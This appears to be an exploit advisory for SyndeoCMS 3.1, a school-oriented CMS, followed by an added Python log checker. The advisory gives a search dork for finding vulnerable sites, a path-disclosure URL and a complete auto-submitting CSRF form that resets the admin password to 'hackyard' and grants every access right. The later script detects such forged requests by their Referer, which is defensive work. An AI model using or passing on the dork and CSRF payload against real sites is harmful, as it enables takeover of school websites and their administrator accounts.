# Version 3.1
# Dork intext:"Site created with SyndeoCMS"
Introduction
------------
SyndeoCMS is a Primary School oriented CMS.
Full Path Disclosure
--------------------
http://[site]/starnet/version.php
CSRF exploit (change admin password)
------------------------------------
<body onload='document.forms[0].submit()'>
<form method='post' action='http://[site]/starnet/index.php?option=configuration&suboption=users&modoption=save_user&user_id=5'>
 <input type='hidden' name='fullname' value='admin'>
 <input type='hidden' name='username' value='admin'>
 <input type='hidden' name='password' value='hackyard'>
 <input type='hidden' name='email' value='dmin@adm.fr'>
 <input type='hidden' name='editor' value='2'>
 <input type='hidden' name='sections' value=''>
 <input type='hidden' name='access_1' value='1'>
 <input type='hidden' name='access_2' value='1'>
 <input type='hidden' name='access_13' value='1'>
 <input type='hidden' name='access_3' value='1'>
 <input type='hidden' name='access_4' value='1'>
 <input type='hidden' name='access_5' value='1'>
 <input type='hidden' name='access_6' value='1'>
 <input type='hidden' name='access_7' value='1'>
 <input type='hidden' name='access_8' value='1'>
 <input type='hidden' name='access_9' value='1'>
 <input type='hidden' name='access_16' value='1'>
 <input type='hidden' name='access_10' value='1'>
 <input type='hidden' name='access_11' value='1'>
 <input type='hidden' name='access_12' value='1'>
 <input type='hidden' name='access_14' value='1'>
 <input type='hidden' name='access_15' value='1'>
 <input type='hidden' name='m_access[14]' value='1'>
 <input type='hidden' name='m_access[8]' value='1'>
 <input type='hidden' name='m_access[6]' value='1'>
 <input type='hidden' name='m_access[10]' value='1'>
 <input type='hidden' name='m_access[0]' value='1'>
 <input type='hidden' name='m_access[15]' value='1'>
 <input type='hidden' name='m_access[1]' value='1'>
 <input type='hidden' name='m_access[11]' value='1'>
 <input type='hidden' name='m_access[12]' value='1'>
 <input type='hidden' name='m_access[9]' value='1'>
 <input type='hidden' name='m_access[13]' value='1'>
 <input type='hidden' name='m_access[16]' value='1'>
 <input type='hidden' name='m_access[7]' value='1'>
 <input type='hidden' name='m_access[19]' value='1'>
 <input type='hidden' name='m_access[2]' value='1'>
 <input type='hidden' name='m_access[17]' value='1'>
 <input type='hidden' name='m_access[18]' value='1'>
 <input type='hidden' name='m_access[3]' value='1'>
 <input type='hidden' name='m_access[4]' value='1'>
 <input type='hidden' name='m_access[5]' value='1'>
</form>
</body>
Groucho
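
A log check for the forged request described above, as an added example that is not part of the original advisory: it flags POSTs to the save_user endpoint whose Referer is missing or names another host. The host school.example, the Combined Log Format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip - user [time] "METHOD target PROTO" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def classify(line, site_host):
    """None if the line is not a save_user POST, else a Referer verdict."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/starnet/index.php"):
        return None
    if parse_qs(url.query).get("modoption") != ["save_user"]:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        return "no-referer"
    ref_host = (urlsplit(referer).hostname or "").lower()
    return "same-origin" if ref_host == site_host.lower() else "cross-origin"

def suspicious(lines, site_host):
    """Return (verdict, line) for save_user POSTs not sent from the site itself."""
    hits = []
    for line in lines:
        verdict = classify(line, site_host)
        if verdict in ("cross-origin", "no-referer"):
            hits.append((verdict, line))
    return hits

# Constructed sample log lines (assumed host: school.example)
REQ = ("POST /starnet/index.php?option=configuration&suboption=users"
       "&modoption=save_user&user_id=5 HTTP/1.1")
STAMP = "[10/Mar/2024:09:14:02 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {STAMP} "{REQ}" 302 - "http://school.example/starnet/index.php" "Mozilla/5.0"',
    f'192.0.2.10 - - {STAMP} "{REQ}" 302 - "http://forum.example/thread/42" "Mozilla/5.0"',
    f'192.0.2.10 - - {STAMP} "GET /starnet/index.php?option=configuration HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - {STAMP} "{REQ}" 302 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, line in suspicious(SAMPLE_LOG, "school.example"):
        print(verdict, line)
```

A missing Referer is reported separately from a foreign one because privacy settings can strip the header from legitimate requests, so those hits need review rather than automatic blocking.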